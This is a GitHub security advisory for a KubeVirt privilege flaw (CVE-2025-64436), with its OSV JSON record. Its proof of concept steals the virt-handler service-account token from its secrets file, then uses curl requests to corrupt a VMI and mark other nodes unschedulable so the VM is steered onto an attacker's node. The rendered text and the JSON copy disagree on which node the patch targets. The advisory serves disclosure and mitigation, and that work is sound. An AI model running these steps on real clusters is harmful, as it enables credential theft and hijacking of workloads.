GHSA-7XGM-5PRM-V5GC

Vulnerability from GitHub – Published: 2025-11-06 23:35 – Updated: 2025-11-27 08:49
Summary
KubeVirt Excessive Role Permissions Could Enable Unauthorized VMI Migrations Between Nodes
Details

Summary

The permissions granted to the virt-handler service account, such as the ability to update VMIs and patch nodes, could be abused to force a VMI migration to an attacker-controlled node.

Details

Following the GitHub security advisory published on March 23, 2023 (GHSA-cp96-jpmq-xrr2), a ValidatingAdmissionPolicy was introduced to impose restrictions on which sections of node resources the virt-handler service account can modify. For instance, the spec section of nodes has been made immutable, and modifications to the labels section are now limited to kubevirt.io-prefixed labels only. Without these restrictions, an attacker could mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.
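
To make the mechanism concrete, a ValidatingAdmissionPolicy of this kind consists of CEL rules that the API server evaluates on node updates. The snippet below is only an illustrative sketch of such a restriction and is not KubeVirt's actual policy; the policy name, the service account name, and the exact expressions are assumptions, and a ValidatingAdmissionPolicyBinding would also be required for it to take effect.

apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingAdmissionPolicy
metadata:
  name: restrict-virt-handler-node-updates   # illustrative name, not KubeVirt's actual policy
spec:
  matchConstraints:
    resourceRules:
      - apiGroups: [""]
        apiVersions: ["v1"]
        operations: ["UPDATE"]
        resources: ["nodes"]
  matchConditions:
    # Only evaluate requests made by the virt-handler service account (name assumed)
    - name: virt-handler-only
      expression: request.userInfo.username == 'system:serviceaccount:kubevirt:kubevirt-handler'
  validations:
    # The node spec must stay immutable
    - expression: object.spec == oldObject.spec
      message: virt-handler may not modify the node spec
    # Labels may only be added or changed if they carry the kubevirt.io prefix
    - expression: >-
        object.metadata.labels.all(k, k.startsWith('kubevirt.io') ||
        (k in oldObject.metadata.labels && object.metadata.labels[k] == oldObject.metadata.labels[k]))
      message: virt-handler may only modify kubevirt.io-prefixed labels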

However, if a virt-handler service account is compromised, either through the pod itself or the underlying node, an attacker may still modify node labels, both on the compromised node and on other nodes within the cluster. Notably, virt-handler sets a specific kubevirt.io boolean label, kubevirt.io/schedulable, which indicates whether the node can host VMI workloads. An attacker could repeatedly patch other nodes by setting this label to false, thereby forcing all VMI instances to be scheduled exclusively on the compromised node.

Another finding (GHSA-ggp9-c99x-54gp) describes how a compromised virt-handler instance can perform operations on other nodes that are intended to be executed solely by virt-api. This significantly increases both the impact and the likelihood of the vulnerability being exploited.

Additionally, by default, the virt-handler service account has permission to update all VMI resources across the cluster, including those not running on the same node. While a security mechanism similar to the kubelet's NodeRestriction feature exists to limit this scope, it is controlled by a feature gate and is therefore not enabled by default.
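
Where the gate is supported, it is enabled through the KubeVirt custom resource of a standard installation. The snippet below is a sketch only: it assumes the gate is exposed under spec.configuration.developerConfiguration.featureGates and that it is named NodeRestriction; the exact identifier should be verified against the release notes of the deployed KubeVirt version.

apiVersion: kubevirt.io/v1
kind: KubeVirt
metadata:
  name: kubevirt
  namespace: kubevirt
spec:
  configuration:
    developerConfiguration:
      featureGates:
        - NodeRestriction   # assumed gate name; verify against the KubeVirt documentation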

PoC

By injecting incorrect data into a running VMI, for example, by altering the kubevirt.io/nodeName label to reference a different node, the VMI is marked as terminated and its state transitions to Succeeded. This incorrect state could mislead an administrator into restarting the VMI, causing it to be re-created on a node of the attacker's choosing. As an example, the following demonstrates how to instantiate a basic VMI:

apiVersion: kubevirt.io/v1
kind: VirtualMachine
metadata:
  name: testvm
spec:
  runStrategy: Always
  template:
    metadata:
      labels:
        kubevirt.io/size: small
        kubevirt.io/domain: testvm
    spec:
      domain:
        devices:
          disks:
            - name: containerdisk
              disk:
                bus: virtio
            - name: cloudinitdisk
              disk:
                bus: virtio
          interfaces:
          - name: default
            masquerade: {}
        resources:
          requests:
            memory: 64M
      networks:
      - name: default
        pod: {}
      volumes:
        - name: containerdisk
          containerDisk:
            image: quay.io/kubevirt/cirros-container-disk-demo
        - name: cloudinitdisk
          cloudInitNoCloud:
            userDataBase64: SGkuXG4=
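
Assuming the manifest above is saved as testvm.yaml (the filename used again later in this walkthrough), it is applied in the usual way:

operator@minikube:~$ kubectl apply -f testvm.yaml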

The VMI is then created on a minikube node identified as minikube-m02:

operator@minikube:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP           NODENAME       READY
testvm   20s   Running   10.244.1.8   minikube-m02   True

Assume that a virt-handler pod running on node minikube-m03 is compromised, and that the attacker wants testvm to be re-deployed on a node under their control.

First, the attacker retrieves the virt-handler service account token in order to perform requests against the Kubernetes API:

# Get the `virt-handler` pod name
attacker@minikube-m03:~$ kubectl get pods  -n kubevirt --field-selector spec.nodeName=minikube-m03 | grep virt-handler
virt-handler-kblgh               1/1     Running   0          8d
# Get the `virt-handler` service account token
attacker@minikube-m03:~$ token=$(kubectl exec -it virt-handler-kblgh -n kubevirt -c virt-handler -- cat /var/run/secrets/kubernetes.io/serviceaccount/token) 
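
As an optional sanity check (not part of the original report), the breadth of these permissions can be confirmed with the stolen token; depending on the local kubeconfig, additional flags such as --server may be needed so that only the bearer token is used:

# Both checks are expected to answer "yes", given the role bindings described above
attacker@minikube-m03:~$ kubectl auth can-i patch nodes --token="$token"
attacker@minikube-m03:~$ kubectl auth can-i update virtualmachineinstances.kubevirt.io --token="$token"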

The attacker updates the VMI object labels in a way that makes it terminate:

# Save the current state of the VMI
attacker@minikube-m03:~$ kubectl get vmi testvm -o json > testvm.json
# Replace the current `nodeName` with the attacker's node in the JSON file
attacker@minikube-m03:~$ sed -i 's/"kubevirt.io\/nodeName": "minikube-m02"/"kubevirt.io\/nodeName": "minikube-m03"/g' testvm.json 
# Perform the UPDATE request, impersonating the virt-handler
attacker@minikube-m03:~$ curl https://192.168.49.2:8443/apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances/testvm -k  -X PUT -d @testvm.json -H "Content-Type: application/json" -H "Authorization: bearer $token"
# Get the current state of the VMI after the UPDATE
attacker@minikube-m03:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP           NODENAME       READY
testvm   42m   Running   10.244.1.8   minikube-m02   False # The VMI is not ready anymore
# Get the current state of the pod after the UPDATE
attacker@minikube-m03:~$ kubectl get pods | grep launcher
virt-launcher-testvm-z2fk4   0/3     Completed   0          44m  # the `virt-launcher` pod is completed
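
As noted earlier, the VMI phase eventually transitions to Succeeded once the bogus nodeName takes effect; this can be observed directly (illustrative command, not part of the original report):

attacker@minikube-m03:~$ kubectl get vmi testvm -o jsonpath='{.status.phase}{"\n"}'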

Now, the attacker can use the excessive permissions of the virt-handler service account to patch the minikube-m02 node in order to mark it as unschedulable for VMI workloads:

attacker@minikube-m03:~$ curl https://192.168.49.2:8443/api/v1/nodes/minikube-m02 -k -H "Authorization: Bearer $token" -H "Content-Type: application/strategic-merge-patch+json" --data '{"metadata":{"labels":{"kubevirt.io/schedulable":"false"}}}' -X PATCH

Note: This request may need to be repeated, as the target node's own virt-handler continuously reconciles the schedulable label on the node it runs on.
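
Whether the label stuck, and how quickly it gets flipped back, can be watched with a label column (illustrative command, not part of the original report):

attacker@minikube-m03:~$ kubectl get node minikube-m02 -L kubevirt.io/schedulable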

Finally, an admin user decides to restart the VMI:

admin@minikube:~$ kubectl delete -f testvm.yaml
admin@minikube:~$ kubectl apply -f testvm.yaml
admin@minikube:~$ kubectl get vmi testvm
NAME     AGE   PHASE     IP            NODENAME       READY
testvm   80s   Running   10.244.0.15   minikube-m03   True

Identifying the origin node of a request is not a straightforward task. One potential solution is to embed additional authentication data, such as the userInfo object, indicating the node on which the service account is currently running. This approach would be similar to Kubernetes' NodeRestriction feature gate. Since Kubernetes version 1.32, the node authorization mode, enforced via the NodeRestriction admission plugin, is enabled by default for kubelets running in the cluster. The equivalent feature gate in KubeVirt should likewise be enabled by default when the underlying Kubernetes version is 1.32 or higher.
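
To make this concrete: with bound service account tokens, recent Kubernetes releases add the originating node to the request's userInfo extra fields, which an admission rule could compare against the node being modified. The fragment below follows the same shape as the policy sketch earlier in this write-up and is purely illustrative; the extra key, the service account name, and the availability of node-bound token information are assumptions to verify for the target Kubernetes version.

# Hypothetical validation fragment for UPDATE/PATCH requests on nodes
validations:
  - expression: >-
      request.userInfo.username != 'system:serviceaccount:kubevirt:kubevirt-handler' ||
      ('authentication.kubernetes.io/node-name' in request.userInfo.extra &&
      object.metadata.name in request.userInfo.extra['authentication.kubernetes.io/node-name'])
    message: virt-handler may only modify the node it is running on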

An alternative approach would be to create a dedicated virt-handler service account for each node, embedding the node name into the account identity. This would allow the origin node to be inferred from the userInfo.username field of the AdmissionRequest object. However, this method introduces additional operational overhead in terms of monitoring and maintenance.

Impact

This vulnerability could allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.

Source advisory record (OSV JSON):

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "kubevirt.io/kubevirt"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-64436"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-269",
      "CWE-276"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-11-06T23:35:49Z",
    "nvd_published_at": "2025-11-07T23:15:46Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nThe permissions granted to the `virt-handler` service account, such as the ability to update VMI and patch nodes, could be abused to force a VMI migration to an attacker-controlled node.\n\n### Details\n\nFollowing the [GitHub security advisory published on March 23 2023](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-cp96-jpmq-xrr2), a `ValidatingAdmissionPolicy` was introduced to impose restrictions on which sections of node resources the `virt-handler` service account can modify. For instance, the `spec` section of nodes has been made immutable, and modifications to the `labels` section are now limited to `kubevirt.io`-prefixed labels only. This vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.\n\n\nHowever, if a `virt-handler` service account is compromised, either through the pod itself or the underlying node, an attacker may still modify node labels, both on the compromised node and on other nodes within the cluster. Notably, `virt-handler` sets a specific `kubevirt.io` boolean label, `kubevirt.io/schedulable`, which indicates whether the node can host VMI workloads. An attacker could repeatedly patch other nodes by setting this label to `false`, thereby forcing all #acr(\"vmi\") instances to be scheduled exclusively on the compromised node.\n\n[Another finding](https://github.com/kubevirt/kubevirt/security/advisories/GHSA-ggp9-c99x-54gp) describes how a compromised `virt-handler` instance can perform operations on other nodes that are intended to be executed solely by `virt-api`. This significantly increases both the impact and the likelihood of the vulnerability being exploited\n\n\nAdditionally, by default, the `virt-handler` service account has permission to update all VMI resources across the cluster, including those not running on the same node. While a security mechanism similar to the kubelet\u0027s `NodeRestriction` feature exists to limit this scope, it is controlled by a feature gate and is therefore not enabled by default.\n\n\n\n### PoC\n\nBy injecting incorrect data into a running VMI, for example, by altering the `kubevirt.io/nodeName` label to reference a different node, the VMI is marked as terminated and its state transitions to `Succeeded`. This incorrect state could mislead an administrator into restarting the VMI, causing it to be re-created on a node of the attacker\u0027s choosing. 
As an example, the following demonstrates how to instantiate a basic VMI:\n\n```yaml\napiVersion: kubevirt.io/v1\nkind: VirtualMachine\nmetadata:\n  name: testvm\nspec:\n  runStrategy: Always\n  template:\n    metadata:\n      labels:\n        kubevirt.io/size: small\n        kubevirt.io/domain: testvm\n    spec:\n      domain:\n        devices:\n          disks:\n            - name: containerdisk\n              disk:\n                bus: virtio\n            - name: cloudinitdisk\n              disk:\n                bus: virtio\n          interfaces:\n          - name: default\n            masquerade: {}\n        resources:\n          requests:\n            memory: 64M\n      networks:\n      - name: default\n        pod: {}\n      volumes:\n        - name: containerdisk\n          containerDisk:\n            image: quay.io/kubevirt/cirros-container-disk-demo\n        - name: cloudinitdisk\n          cloudInitNoCloud:\n            userDataBase64: SGkuXG4=\n```\n\nThe VMI is then created on a minikube node identified with `minikube-m02`:\n\n```bash\noperator@minikube:~$ kubectl get vmi testvm\nNAME     AGE   PHASE     IP           NODENAME       READY\ntestvm   20s   Running   10.244.1.8   minikube-m02   True\n```\n\nAssume that a `virt-handler` pod, running on node `minikube-m03`, is compromised and an attacker and the latter wants the `testvm` to be re-deployed on a controlled by them node.\n\nFirst, we retrieve the `virt-handler` service account token in order to be able to perform requests to the Kubernetes API:\n\n```bash\n# Get the `virt-handler` pod name\nattacker@minikube-m03:~$ kubectl get pods  -n kubevirt --field-selector spec.nodeName=minikube-m03 | grep virt-handler\nvirt-handler-kblgh               1/1     Running   0          8d\n# get the `virt-handler` SA account token\nattacker@minikube-m03:~$ token=$(kubectl exec -it virt-handler-kblgh -n kubevirt -c virt-handler -- cat /var/run/secrets/kubernetes.io/serviceaccount/token) \n```\n\nThe attacker updates the VMI object labels in a way that makes it terminate:\n\n```bash\n# Save the current state of the VMI\nattacker@minikube-m03:~$ kubectl get vmi testvm -o json \u003e testvm.json\n# replace the current `nodeName` to another one in the JSON file\nattacker@minikube-m03:~$ sed -i \u0027s/\"kubevirt.io\\/nodeName\": \"minikube-m02\"/\"kubevirt.io\\/nodeName\": \"minikube-m03\"/g\u0027 testvm.json \n# Perform the UPDATE request, impersonating the virt-handler\nattacker@minikube-m03:~$ curl https://192.168.49.2:8443/apis/kubevirt.io/v1/namespaces/default/virtualmachineinstances/testvm -k  -X PUT -d @testvm.json -H \"Content-Type: application/json\" -H \"Authorization: bearer $token\"\n# Get the current state of the VMI after the UPDATE\nattacker@minikube-m03:~$ kubectl get vmi testvm\nNAME     AGE   PHASE     IP           NODENAME       READY\ntestvm   42m   Running   10.244.1.8   minikube-m02   False # The VMI is not ready anymore\n# Get the current state of the pod after the UPDATE\nattacker@minikube-m03:~$ kubectl get pods | grep launcher\nvirt-launcher-testvm-z2fk4   0/3     Completed   0          44m  # the `virt-launcher` pod is completed\n```\n\nNow, the attacker can use the excessive permissions of the `virt-handler` service account to patch the `minikube-m02` node in order to mark it as unschedulable for VMI workloads:\n\n```bash\nattacker@minikube-m03:~$ curl https://192.168.49.2:8443/api/v1/nodes/minikube-m03 -k -H \"Authorization: Bearer $token\" -H \"Content-Type: application/strategic-merge-patch+json\" --data 
\u0027{\"metadata\":{\"labels\":{\"kubevirt.io/schedulable\":\"false\"}}}\u0027 -X PATCH\n```\n\n**Note: This request could require multiple invocations as the `virt-handler` is continuously updating the schedulable state of the node it is running on**.\n\nFinally, an admin user decides to restart the VMI:\n\n```bash\nadmin@minikube:~$ kubectl delete -f testvm.yaml\nadmin@minikube:~$ kubectl apply -f testvm.yaml\nadmin@minikube:~$ kubectl get vmi testvm\nNAME     AGE   PHASE     IP            NODENAME       READY\ntestvm   80s   Running   10.244.0.15   minikube-m03   True\n```\n\nIdentifying the origin node of a request is not a straightforward task. One potential solution is to embed additional authentication data, such as the `userInfo` object, indicating the node on which the service account is currently running. This approach would be similar to Kubernetes\u0027 `NodeRestriction` feature gate. Since Kubernetes version 1.32, the `node` authorization mode, enforced via the `NodeRestriction` admission plugin, is enabled by default for kubelets running in the cluster. The equivalent feature gate in KubeVirt should likewise be enabled by default when the underlying Kubernetes version is 1.32 or higher.\n\nAn alternative approach would be to create a dedicated `virt-handler` service account for each node, embedding the node name into the account identity. This would allow the origin node to be inferred from the `userInfo.username` field of the `AdmissionRequest` object. However, this method introduces additional operational overhead in terms of monitoring and maintenance.\n\n\n### Impact\n\nThis vulnerability could otherwise allow an attacker to mark all nodes as unschedulable, potentially forcing the migration or creation of privileged pods onto a compromised node.",
  "id": "GHSA-7xgm-5prm-v5gc",
  "modified": "2025-11-27T08:49:08Z",
  "published": "2025-11-06T23:35:49Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-7xgm-5prm-v5gc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64436"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/kubevirt/kubevirt"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "KubeVirt Excessive Role Permissions Could Enable Unauthorized VMI Migrations Between Nodes"
}

